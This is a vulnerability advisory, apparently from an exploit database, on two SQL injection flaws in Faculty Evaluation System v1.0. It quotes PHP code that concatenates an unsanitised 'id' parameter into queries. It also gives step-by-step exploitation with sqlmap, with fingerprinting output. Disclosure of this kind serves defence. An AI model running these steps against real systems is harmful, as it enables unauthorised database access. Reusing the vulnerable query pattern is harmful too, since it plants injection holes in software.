Faculty Evaluation System v1.0 SQL Injection

2023.07.21
Credit: Andrey Stoykov
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection # Date: 07/2023 # Exploit Author: Andrey Stoykov # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip # Version: 1.0 # Tested on: Windows Server 2022 SQLi #1 File: edit_evaluation Line #4 $qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array(); [...] SQLi #2 File: view_faculty.php Line #4 // Add "id" parameter after "view_faculty" parameter then add equals "id" with integer [...] $qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array(); [...] Steps to Exploit: 1. Login to application 2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1" 3. Copy request to intercept proxy to file 4. Exploit using SQLMap sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint [...] [INFO] testing MySQL [INFO] confirming MySQL [INFO] the back-end DBMS is MySQL [INFO] actively fingerprinting MySQL [INFO] executing MySQL comment injection fingerprint back-end DBMS: active fingerprint: MySQL >= 5.7 comment injection fingerprint: MySQL 5.6.49 fork fingerprint: MariaDB [...]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top